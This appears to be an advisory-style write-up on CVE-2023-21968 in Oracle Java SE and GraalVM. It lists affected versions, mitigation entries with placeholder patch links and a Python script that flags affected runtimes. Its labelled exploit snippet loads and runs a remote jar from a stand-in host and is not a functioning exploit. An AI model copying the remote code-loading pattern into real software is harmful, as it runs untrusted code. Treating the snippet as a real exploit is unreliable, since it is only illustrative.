CVE-2023-21968 is a security vulnerability in Oracle Java SE and Oracle GraalVM Enterprise Edition that allows an unauthenticated attacker with network access via multiple protocols to compromise these platforms. Affected versions include Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5, and 22.3.1. This vulnerability is difficult to exploit but can result in unauthorized update, insert, or delete access to some accessible data. The CVSS 3.1 Base Score is 3.7, with the vector (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).

Exploit Details

The vulnerability specifically applies to Java deployments that run sandboxed Java Web Start applications or sandboxed Java applets and load untrusted code, such as code originating from the internet. It relies on the Java sandbox for security and can be exploited through APIs in the Libraries component, such as through a web service that supplies data to the APIs.

The following code snippet illustrates a potential exploit scenario: a Web Start application that loads untrusted code over the network and hands its result to a library API.

// Java Web Start application example
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;

public class WebStartExploit {
    public static void main(String[] args) {
        // Load untrusted code from a remote URL (the sandboxed-deployment
        // condition described above)
        try (URLClassLoader loader = new URLClassLoader(
                new URL[]{new URL("https://example.com/malicious.jar")})) {
            Class<?> exploitClass = loader.loadClass("malicious.Exploit");
            // Invoke the untrusted class's static run() method and pass its
            // result into the vulnerable library operation
            Method run = exploitClass.getMethod("run");
            vulnerableMethod(run.invoke(null));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void vulnerableMethod(Object obj) {
        // Perform update, insert, or delete action on accessible data
    }
}

Mitigation

Oracle has released patches to address this vulnerability in the affected versions of Oracle Java SE and GraalVM Enterprise Edition. Users should apply the appropriate patch or update to protect against this vulnerability:

- Oracle Java SE 8u361, 8u361-perf: Patch Link
- Oracle Java SE 11.0.18: Patch Link
- Oracle Java SE 17.0.6: Patch Link
- Oracle Java SE 20: Patch Link
- Oracle GraalVM Enterprise Edition 20.3.9: Patch Link
- Oracle GraalVM Enterprise Edition 21.3.5: Patch Link
- Oracle GraalVM Enterprise Edition 22.3.1: Patch Link
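One way to inventory which runtimes still need the patches above is to parse `java -version` output and flag the affected releases named on this page. The Python check below is an added example, not Oracle's tooling or anything from the advisory; the sample outputs are constructed, the `GraalVM EE <x.y.z>` banner format is assumed, and treating earlier updates within an affected release family as likewise unpatched is my assumption.

```python
import re
import subprocess

# Releases the advisory above names as affected, as (major, minor, update)
# tuples in the normalised form returned by parse_java_version().
AFFECTED_JAVA_SE = {
    (8, 0, 361),   # 8u361 and 8u361-perf
    (11, 0, 18),   # 11.0.18
    (17, 0, 6),    # 17.0.6
    (20, 0, 0),    # 20
}
AFFECTED_GRAALVM_EE = {(20, 3, 9), (21, 3, 5), (22, 3, 1)}

# `java -version` prints the runtime version in double quotes on its first line.
_JAVA_VERSION_RE = re.compile(r'version "(?P<v>[^"]+)"')
# Assumption: a GraalVM EE runtime identifies itself with "GraalVM EE <x.y.z>"
# in the VM line of the same output.
_GRAALVM_RE = re.compile(r"GraalVM EE (?P<v>\d+\.\d+\.\d+)")


def _to_tuple(raw: str) -> tuple:
    """Normalise a version string to (major, minor, update).

    Handles the legacy "1.8.0_361" form and the modern "11.0.18" / "20"
    forms; build and pre-release suffixes ("+10", "-ea") are dropped.
    """
    raw = raw.split("+")[0].split("-")[0]
    if raw.startswith("1."):                        # legacy 1.8.0_361 layout
        family, _, update = raw[2:].partition("_")  # "8.0", "361"
        return (int(family.split(".")[0]), 0, int(update or 0))
    parts = [int(p) for p in raw.split(".")]
    parts += [0] * (3 - len(parts))                 # "20" -> (20, 0, 0)
    return tuple(parts[:3])


def parse_java_version(output: str):
    """Return (major, minor, update) from `java -version` output, or None."""
    m = _JAVA_VERSION_RE.search(output)
    return _to_tuple(m.group("v")) if m else None


def parse_graalvm_version(output: str):
    """Return the GraalVM EE version tuple from `java -version` output, or None."""
    m = _GRAALVM_RE.search(output)
    return _to_tuple(m.group("v")) if m else None


def is_affected(output: str) -> bool:
    """True when the runtime is an affected release from the list above,
    or an earlier update of the same release family (assumption: updates
    older than the listed one in each family also predate the fix).
    """
    java = parse_java_version(output)
    if java and any(java[0] == a[0] and java <= a for a in AFFECTED_JAVA_SE):
        return True
    graal = parse_graalvm_version(output)
    if graal and any(graal[:2] == g[:2] and graal <= g for g in AFFECTED_GRAALVM_EE):
        return True
    return False


def check_local_java() -> bool:
    """Run `java -version` on this host (it writes to stderr) and classify it."""
    proc = subprocess.run(["java", "-version"], capture_output=True, text=True)
    return is_affected(proc.stderr + proc.stdout)


# Constructed sample outputs for the worked run below (not captured from
# real systems).
SAMPLE_8U361 = (
    'java version "1.8.0_361"\n'
    'Java(TM) SE Runtime Environment (build 1.8.0_361-b09)\n'
)
SAMPLE_17_PATCHED = 'java version "17.0.7" 2023-04-18 LTS\n'
SAMPLE_GRAALVM = (
    'java version "17.0.6" 2023-01-17 LTS\n'
    'Java(TM) SE Runtime Environment GraalVM EE 22.3.1 (build 17.0.6+9-LTS-jvmci-22.3-b13)\n'
)

if __name__ == "__main__":
    for name, sample in [("8u361", SAMPLE_8U361), ("17.0.7", SAMPLE_17_PATCHED),
                         ("GraalVM EE 22.3.1", SAMPLE_GRAALVM)]:
        print(f"{name}: {'AFFECTED' if is_affected(sample) else 'not affected'}")
```

The check compares version numbers only; it does not tell an Oracle build from another vendor's build of the same version, so pair it with your package inventory before acting on the result.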

Original References

- Oracle Security Alert Advisory - CVE-2023-21968
- NVD - CVE-2023-21968

Conclusion

CVE-2023-21968 is a notable vulnerability in Oracle Java SE and GraalVM Enterprise Edition that could potentially allow unauthorized access to update, insert, or delete some accessible data. Although it is difficult to exploit, it's important to keep your Java deployments up-to-date and apply the necessary patches to protect against potential security threats.

Timeline

Published on: 04/18/2023 20:15:00 UTC
Last modified on: 05/17/2023 17:06:00 UTC